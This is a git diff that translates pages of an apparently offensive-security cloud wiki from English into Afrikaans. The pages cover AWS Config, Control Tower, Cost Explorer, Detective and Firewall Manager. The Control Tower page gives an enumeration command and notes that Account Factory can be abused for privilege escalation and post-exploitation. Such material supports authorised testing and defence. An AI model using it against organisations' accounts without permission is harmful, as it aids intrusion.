+- **Related events**: Dit verwys na AWS CloudTrail. Dit sal die **AWS CloudTrail gebeurtenis-ID wat verband hou met die verandering wat die skepping van hierdie CI geaktiveer het** vertoon. Daar word 'n nuwe CI gemaak vir elke verandering wat teen 'n hulpbron gemaak word. As gevolg hiervan, sal verskillende CloudTrail gebeurtenis-ID's geskep word.
 
-**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type.
+**Configuration History**: Dit is moontlik om die konfigurasiegeskiedenis van hulpbronne te verkry danksy die konfigurasie-items. 'n Konfigurasiegeskiedenis word elke 6 uur gelewer en bevat alle CI's vir 'n spesifieke hulpbron tipe.
 
-**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data.
+**Configuration Streams**: Konfigurasie-items word na 'n SNS-onderwerp gestuur om analise van die data moontlik te maak.
 
-**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources.
+**Configuration Snapshots**: Konfigurasie-items word gebruik om 'n punt-in-tyd snapshot van alle ondersteunde hulpbronne te skep.
 
-**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
+**S3 word gebruik om** die Konfigurasiegeskiedenis lêers en enige Konfigurasie-snapshots van jou data binne 'n enkele emmer te stoor, wat binne die Konfigurasie-opnemer gedefinieer word. As jy verskeie AWS-rekeninge het, wil jy dalk jou konfigurasiegeskiedenis lêers in dieselfde S3-emmer vir jou primêre rekening saamvoeg. Jy sal egter skrywe toegang vir hierdie diens beginsel, config.amazonaws.com, en jou sekondêre rekeninge met skrywe toegang tot die S3-emmer in jou primêre rekening moet toeken.
 
 ### Functioning
 
-- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config
-- Stores everything in S3 bucket
-- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings
-- Lambda feeds back to Config
-- If rule has been broken, Config fires up an SNS
+- Wanneer jy veranderinge maak, byvoorbeeld aan 'n sekuriteitsgroep of emmer toegangbeheerlys —> laat dit af as 'n gebeurtenis wat deur AWS Config opgetel word
+- Stoor alles in S3-emmer
+- Afhangende van die opstelling, sodra iets verander, kan dit 'n lambda-funksie aktiveer OF 'n lambda-funksie skeduleer om periodiek deur die AWS Config-instellings te kyk
+- Lambda voer terug na Config
+- As 'n reël oortree is, aktiveer Config 'n SNS
 
 ![](<../../../../images/image (126).png>)
 
 ### Config Rules
 
-Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
-AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
+Config-reëls is 'n uitstekende manier om jou te help **om spesifieke nakomingskontroles** **en beheer oor jou hulpbronne af te dwing**, en laat jou toe om 'n ideale ontplooiingsspesifikasie vir elkeen van jou hulpbron tipes aan te neem. Elke reël **is in wese 'n lambda-funksie** wat, wanneer dit opgeroep word, die hulpbron evalueer en 'n paar eenvoudige logika uitvoer om die nakomingsresultaat met die reël te bepaal. **Elke keer as 'n verandering gemaak word** aan een van jou ondersteunde hulpbronne, **sal AWS Config die nakoming teen enige konfigurasie reëls wat jy in plek het, nagaan**.\
+AWS het 'n aantal **voorgedefinieerde reëls** wat onder die sekuriteitsdak val en gereed is om te gebruik. Byvoorbeeld, Rds-storage-encrypted. Dit kontroleer of stoorversleuteling geaktiveer is deur jou RDS-databasisinstansies. Encrypted-volumes. Dit kontroleer of enige EBS-volumes wat 'n aangehegte toestand het, versleuteld is.
 
-- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
-- **Custom rules**: You can create your own rules to check specific customconfigurations.
+- **AWS Managed rules**: Stel van voorgedefinieerde reëls wat baie beste praktyke dek, so dit is altyd die moeite werd om hierdie reëls eers te blaai voordat jy jou eie opstel, aangesien daar 'n kans is dat die reël dalk reeds bestaan.
+- **Custom rules**: Jy kan jou eie reëls skep om spesifieke pasgemaakte konfigurasies na te gaan.
 
-Limit of 50 config rules per region before you need to contact AWS for an increase.\
-Non compliant results are NOT deleted.
+Beperking van 50 konfigurasie reëls per streek voordat jy AWS moet kontak vir 'n verhoging.\
+Nie-nakomende resultate word NIE verwyder nie.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
index 9fab39fb8..0e6f02e09 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
@@ -5,33 +5,31 @@
 ## Control Tower
 
 > [!NOTE]
-> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them.
+> In samevatting is Control Tower 'n diens wat dit moontlik maak om beleid vir al jou rekeninge binne jou organisasie te definieer. So in plaas daarvan om elkeen van hulle te bestuur, kan jy beleid vanaf Control Tower stel wat op hulle toegepas sal word.
 
-AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS.
+AWS Control Tower is 'n **diens wat deur Amazon Web Services (AWS) verskaf word** wat organisasies in staat stel om 'n veilige, nakomings- en multi-rekeningomgewing in AWS op te stel en te bestuur.
 
-AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog.
+AWS Control Tower bied 'n **vooraf gedefinieerde stel van beste-praktyk bloudrukke** wat aangepas kan word om aan spesifieke **organisatoriese vereistes** te voldoen. Hierdie bloudrukke sluit vooraf-gekonfigureerde AWS-dienste en -kenmerke in, soos AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, en AWS Service Catalog.
 
-With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies.
+Met AWS Control Tower kan administrateurs vinnig 'n **multi-rekeningomgewing opstel wat aan organisatoriese vereistes voldoen**, soos **veiligheid** en nakoming. Die diens bied 'n sentrale dashboard om rekeninge en hulpbronne te besigtig en te bestuur, en dit outomatiseer ook die voorsiening van rekeninge, dienste en beleid.
 
-In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs.
+Boonop bied AWS Control Tower veiligheidsrails, wat 'n stel van vooraf-gekonfigureerde beleid is wat verseker dat die omgewing nakom aan organisatoriese vereistes. Hierdie beleid kan aangepas word om aan spesifieke behoeftes te voldoen.
 
-Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives.
+Algeheel vereenvoudig AWS Control Tower die proses om 'n veilige, nakomings- en multi-rekeningomgewing in AWS op te stel en te bestuur, wat dit vir organisasies makliker maak om op hul kernbesigheidsdoelwitte te fokus.
 
 ### Enumeration
 
-For enumerating controltower controls, you first need to **have enumerated the org**:
+Vir die opsporing van controltower kontroles, moet jy eers **die org opgespoor het**:
 
 {{#ref}}
 ../aws-organizations-enum.md
 {{#endref}}
-
 ```bash
 # Get controls applied in an account
 aws controltower list-enabled-controls --target-identifier arn:aws:organizations::<acc_id>:ou/<ou-id>
 ```
-
 > [!WARNING]
-> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts
+> Control Tower kan ook **Account factory** gebruik om **CloudFormation templates** in **rekeninge uit te voer en dienste** (privesc, post-exploitation...) in daardie rekeninge te laat loop
 
 ### Post Exploitation & Persistence
 
@@ -40,7 +38,3 @@ aws controltower list-enabled-controls --target-identifier arn:aws:organizations
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
index 2f967331b..4a5e8035d 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
@@ -2,18 +2,14 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Cost Explorer and Anomaly detection
+## Cost Explorer en Anomalie-detectie
 
-This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\
-Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**.
+Dit stel jou in staat om te kyk **hoe jy geld spandeer op AWS-dienste** en help jou **om anomalieë te detecteer**.\
+Boonop kan jy 'n anomalie-detectie konfigureer sodat AWS jou waarsku wanneer 'n **anomalie in koste gevind word**.
 
-### Budgets
+### Begrotings
 
-Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\
-Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
+Begrotings help om **koste en gebruik te bestuur**. Jy kan **waarskuwings ontvang wanneer 'n drempel bereik word**.\
+Ook kan dit gebruik word vir nie-koste verwante monitering soos die gebruik van 'n diens (hoeveel GB word in 'n spesifieke S3-bucket gebruik?).
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
index 9d1a40eba..401aa18cb 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
@@ -4,9 +4,9 @@
 
 ## Detective
 
-**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations.
+**Amazon Detective** stroomlyn die sekuriteitsondersoekproses, wat dit meer doeltreffend maak om **te analiseer, ondersoek te doen, en die oorsaak** van sekuriteitskwessies of ongewone aktiwiteite te identifiseer. Dit outomatiseer die insameling van logdata van AWS-hulpbronne en gebruik **masjienleer, statistiese analise, en grafteorie** om 'n onderling verbonde datastel te bou. Hierdie opstelling verbeter die spoed en doeltreffendheid van sekuriteitsondersoeke aansienlik.
 
-The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause.
+Die diens vergemaklik diepgaande verkenning van sekuriteitsvoorvalle, wat sekuriteitspanne in staat stel om vinnig die onderliggende oorsake van kwessies te verstaan en aan te spreek. Amazon Detective analiseer groot hoeveelhede data van bronne soos VPC Flow Logs, AWS CloudTrail, en Amazon GuardDuty. Dit genereer outomaties 'n **omvattende, interaktiewe oorsig van hulpbronne, gebruikers, en hul interaksies oor tyd**. Hierdie geïntegreerde perspektief bied alle nodige besonderhede en konteks op een plek, wat spanne in staat stel om die redes agter sekuriteitsbevindinge te onderskei, relevante historiese aktiwiteite te ondersoek, en vinnig die oorsaak te bepaal.
 
 ## References
 
@@ -14,7 +14,3 @@ The service eases in-depth exploration of security incidents, allowing security
 - [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
index 0369f075c..d6eb58fb4 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
@@ -4,80 +4,79 @@
 
 ## Firewall Manager
 
-**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones.
+**AWS Firewall Manager** stroomlyn die bestuur en onderhoud van **AWS WAF, AWS Shield Advanced, Amazon VPC-sekuriteitsgroepe en Netwerk Toegang Beheer Lyste (ACLs), en AWS Network Firewall, AWS Route 53 Resolver DNS Firewall en derdeparty-vuurmure** oor verskeie rekeninge en hulpbronne. Dit stel jou in staat om jou vuurmuurreëls, Shield Advanced beskermings, VPC-sekuriteitsgroepe, en Network Firewall-instellings net een keer te konfigureer, met die diens **wat hierdie reëls en beskermings outomaties afdwing oor jou rekeninge en hulpbronne**, insluitend nuut bygevoegde.
 
-The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account.
+Die diens bied die vermoë om **spesifieke hulpbronne saam te groepeer en te beskerm**, soos dié wat 'n gemeenskaplike etiket deel of al jou CloudFront verspreidings. 'n Belangrike voordeel van Firewall Manager is sy vermoë om **outomaties beskerming uit te brei na nuut bygevoegde hulpbronne** in jou rekening.
 
-A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers.
+'n **Reëlgroep** (n versameling van WAF-reëls) kan in 'n AWS Firewall Manager-beleid ingesluit word, wat dan aan spesifieke AWS-hulpbronne soos CloudFront verspreidings of toepassingslaaibalansers gekoppel word.
 
-AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists:
+AWS Firewall Manager bied **bestuurde toepassings- en protokollyste** om die konfigurasie en bestuur van sekuriteitsgroepbeleide te vereenvoudig. Hierdie lyste stel jou in staat om die protokolle en toepassings wat deur jou beleide toegelaat of geweier word, te definieer. Daar is twee tipes bestuurde lyste:
 
-- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version.
-- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required.
+- **Firewall Manager bestuurde lyste**: Hierdie lyste sluit **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** en **FMS-Default-Protocols-Allowed** in. Hulle word deur Firewall Manager bestuur en sluit algemeen gebruikte toepassings en protokolle in wat aan die algemene publiek toegelaat of geweier moet word. Dit is nie moontlik om hulle te redigeer of te verwyder nie, maar jy kan sy weergawe kies.
+- **Pasgemaakte bestuurde lyste**: Jy bestuur hierdie lyste self. Jy kan pasgemaakte toepassings- en protokollyste skep wat op jou organisasie se behoeftes afgestem is. Anders as Firewall Manager bestuurde lyste, het hierdie lyste nie weergawes nie, maar jy het volle beheer oor pasgemaakte lyste, wat jou toelaat om hulle te skep, te redigeer en te verwyder soos benodig.
 
-It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option.
+Dit is belangrik om te noem dat **Firewall Manager-beleide slegs "Block" of "Count" aksies** vir 'n reëlgroep toelaat, sonder 'n "Allow" opsie.
 
 ### Prerequisites
 
-The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment:
+Die volgende vereiste stappe moet voltooi word voordat jy voortgaan om Firewall Manager te konfigureer om jou organisasie se hulpbronne effektief te beskerm. Hierdie stappe bied die fundamentele opstelling wat benodig word vir Firewall Manager om sekuriteitsbeleide af te dwing en nakoming oor jou AWS-omgewing te verseker:
 
-1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization.
-2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts.
-3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management.
-4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors.
-5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security.
-6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates.
+1. **Sluit aan en konfigureer AWS Organizations:** Verseker dat jou AWS-rekening deel is van die AWS Organizations-organisasie waar die AWS Firewall Manager-beleide beplan word om geïmplementeer te word. Dit stel sentrale bestuur van hulpbronne en beleide oor verskeie AWS-rekeninge binne die organisasie moontlik.
+2. **Skep 'n AWS Firewall Manager Default Administrator Account:** Stel 'n standaard administrateurrekening in spesifiek vir die bestuur van Firewall Manager-sekuriteitsbeleide. Hierdie rekening sal verantwoordelik wees vir die konfigurasie en afdwinging van sekuriteitsbeleide oor die organisasie. Slegs die bestuurrekening van die organisasie kan Firewall Manager standaard administrateurrekeninge skep.
+3. **Aktiveer AWS Config:** Aktiveer AWS Config om Firewall Manager van die nodige konfigurasiedata en insigte te voorsien wat benodig word om sekuriteitsbeleide effektief af te dwing. AWS Config help om hulpbron konfigurasies en veranderinge te analiseer, te oudit, te monitor en te oudit, wat beter sekuriteitsbestuur fasiliteer.
+4. **Vir Derdeparty-beleide, inteken in die AWS Marketplace en konfigureer Derdeparty-instellings:** As jy van plan is om derdeparty-vuurmuurbeleide te gebruik, teken in op hulle in die AWS Marketplace en konfigureer die nodige instellings. Hierdie stap verseker dat Firewall Manager kan integreer en beleide van vertroude derdeparty-verskaffers kan afdwing.
+5. **Vir Netwerk Vuurmuur en DNS Vuurmuur Beleide, aktiveer hulpbrondeling:** Aktiveer hulpbrondeling spesifiek vir Netwerk Vuurmuur en DNS Vuurmuur beleide. Dit stel Firewall Manager in staat om vuurmuurbeskerming toe te pas op jou organisasie se VPCs en DNS-resolusie, wat netwerk sekuriteit verbeter.
+6. **Om AWS Firewall Manager in streke te gebruik wat standaard gedeaktiveer is:** As jy van plan is om Firewall Manager in AWS-streke te gebruik wat standaard gedeaktiveer is, verseker dat jy die nodige stappe neem om sy funksionaliteit in daardie streke te aktiveer. Dit verseker konsekwente sekuriteitsafdwinging oor alle streke waar jou organisasie opereer.
 
-For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).
+Vir meer inligting, kyk: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).
 
 ### Types of protection policies
 
-AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure:
+AWS Firewall Manager bestuur verskeie tipes beleide om sekuriteitsbeheer oor verskillende aspekte van jou organisasie se infrastruktuur af te dwing:
 
-1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets.
-2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats.
-3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access.
-4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment.
-5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules.
-6. **Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic.
-7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment.
-   1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls.
-   2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures.
+1. **AWS WAF Policy:** Hierdie beleids tipe ondersteun beide AWS WAF en AWS WAF Classic. Jy kan definieer watter hulpbronne deur die beleid beskerm word. Vir AWS WAF-beleide kan jy stelle reëlgroepe spesifiseer om eerste en laaste in die web ACL te loop. Boonop kan rekening eienaars reëls en reëlgroepe byvoeg om tussen hierdie stelle te loop.
+2. **Shield Advanced Policy:** Hierdie beleid pas Shield Advanced beskermings oor jou organisasie toe vir gespesifiseerde hulpbron tipes. Dit help om teen DDoS-aanvalle en ander bedreigings te beskerm.
+3. **Amazon VPC Security Group Policy:** Met hierdie beleid kan jy sekuriteitsgroepe bestuur wat deur jou organisasie gebruik word, en 'n basiese stel reëls oor jou AWS-omgewing afdwing om netwerktoegang te beheer.
+4. **Amazon VPC Network Access Control List (ACL) Policy:** Hierdie beleids tipe gee jou beheer oor netwerk ACLs wat in jou organisasie gebruik word, wat jou toelaat om 'n basiese stel netwerk ACLs oor jou AWS-omgewing af te dwing.
+5. **Network Firewall Policy:** Hierdie beleid pas AWS Network Firewall beskerming toe op jou organisasie se VPCs, wat netwerk sekuriteit verbeter deur verkeer te filter op grond van vooraf gedefinieerde reëls.
+6. **Amazon Route 53 Resolver DNS Firewall Policy:** Hierdie beleid pas DNS Firewall beskermings toe op jou organisasie se VPCs, wat help om kwaadwillige domeinresolusie pogings te blokkeer en sekuriteitsbeleide vir DNS-verkeer af te dwing.
+7. **Third-Party Firewall Policy:** Hierdie beleids tipe pas beskermings van derdeparty-vuurmure toe, wat deur intekening beskikbaar is deur die AWS Marketplace-konsol. Dit stel jou in staat om bykomende sekuriteitsmaatreëls van vertroude verskaffers in jou AWS-omgewing te integreer.
+1. **Palo Alto Networks Cloud NGFW Policy:** Hierdie beleid pas Palo Alto Networks Cloud Next Generation Firewall (NGFW) beskermings en reëlstapels toe op jou organisasie se VPCs, wat gevorderde bedreigingsvoorkoming en toepassingsvlak sekuriteitsbeheer bied.
+2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** Hierdie beleid pas Fortigate Cloud Native Firewall (CNF) as 'n diens beskermings toe, wat toonaangewende bedreigingsvoorkoming, webtoepassing vuurmuur (WAF), en API-beskerming bied wat op wolkinfrastrukture afgestem is.
 
 ### Administrator accounts
 
-AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts.
+AWS Firewall Manager bied buigsaamheid in die bestuur van vuurmuurhulpbronne binne jou organisasie deur sy administratiewe omvang en twee tipes administrateurrekeninge.
 
-**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include:
+**Administratiewe omvang definieer die hulpbronne wat 'n Firewall Manager administrateur kan bestuur**. Nadat 'n AWS Organizations bestuurrekening 'n organisasie by Firewall Manager aanmeld, kan dit addisionele administrateurs met verskillende administratiewe omfange skep. Hierdie omfange kan insluit:
 
-- Accounts or organizational units (OUs) that the administrator can apply policies to.
-- Regions where the administrator can perform actions.
-- Firewall Manager policy types that the administrator can manage.
+- Rekeninge of organisatoriese eenhede (OUs) waaraan die administrateur beleide kan toepas.
+- Streke waar die administrateur aksies kan uitvoer.
+- Firewall Manager beleids tipes wat die administrateur kan bestuur.
 
-Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege.
+Administratiewe omvang kan ofwel **volledig of beperk** wees. Volledige omvang gee die administrateur toegang tot **alle gespesifiseerde hulpbron tipes, streke, en beleids tipes**. In teenstelling hiermee, **beperkte omvang bied administratiewe toestemming slegs aan 'n subgroep van hulpbronne, streke, of beleids tipes**. Dit is raadsaam om administrateurs slegs die toestemming te gee wat hulle nodig het om hul rolle effektief te vervul. Jy kan enige kombinasie van hierdie administratiewe omvang toestande op 'n administrateur toepas, wat nakoming van die beginsel van minste voorreg verseker.
 
-There are two distinct types of administrator accounts, each serving specific roles and responsibilities:
+Daar is twee duidelike tipes administrateurrekeninge, elk met spesifieke rolle en verantwoordelikhede:
 
 - **Default Administrator:**
-  - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager.
-  - This account has the capability to manage third-party firewalls and possesses full administrative scope.
-  - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization.
-  - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization.
+- Die standaard administrateurrekening word deur die AWS Organizations-organisasie se bestuurrekening tydens die aanmeldproses by Firewall Manager geskep.
+- Hierdie rekening het die vermoë om derdeparty-vuurmure te bestuur en het volle administratiewe omvang.
+- Dit dien as die primêre administrateurrekening vir Firewall Manager, verantwoordelik vir die konfigurasie en afdwinging van sekuriteitsbeleide oor die organisasie.
+- Terwyl die standaard administrateur volle toegang tot alle hulpbron tipes en administratiewe funksies het, werk dit op dieselfde gelyke vlak as ander administrateurs as verskeie administrateurs binne die organisasie gebruik word.
 - **Firewall Manager Administrators:**
-  - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration.
-  - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards.
-  - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager.
+- Hierdie administrateurs kan hulpbronne bestuur binne die omvang wat deur die AWS Organizations bestuurrekening aangewys is, soos gedefinieer deur die administratiewe omvang konfigurasie.
+- Firewall Manager administrateurs word geskep om spesifieke rolle binne die organisasie te vervul, wat die delegasie van verantwoordelikhede moontlik maak terwyl sekuriteit en nakomingstandaarde gehandhaaf word.
+- By die skepping, kontroleer Firewall Manager met AWS Organizations om te bepaal of die rekening reeds 'n gedelegeerde administrateur is. As nie, bel Firewall Manager Organisasies om die rekening as 'n gedelegeerde administrateur vir Firewall Manager aan te dui.
 
-Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources.
+Die bestuur van hierdie administrateurrekeninge behels die skepping daarvan binne Firewall Manager en die definisie van hul administratiewe omfange volgens die organisasie se sekuriteitsvereistes en die beginsel van minste voorreg. Deur toepaslike administratiewe rolle toe te ken, kan organisasies effektiewe sekuriteitsbestuur verseker terwyl hulle fyn beheer oor toegang tot sensitiewe hulpbronne handhaaf.
 
-It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed:
+Dit is belangrik om te beklemtoon dat **slegs een rekening binne 'n organisasie as die Firewall Manager standaard administrateur kan dien**, wat die beginsel van "**eerste in, laaste uit**" volg. Om 'n nuwe standaard administrateur aan te dui, moet 'n reeks stappe gevolg word:
 
-- First, each Firewall Administrator administrator account must revoke their own account.
-- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account.
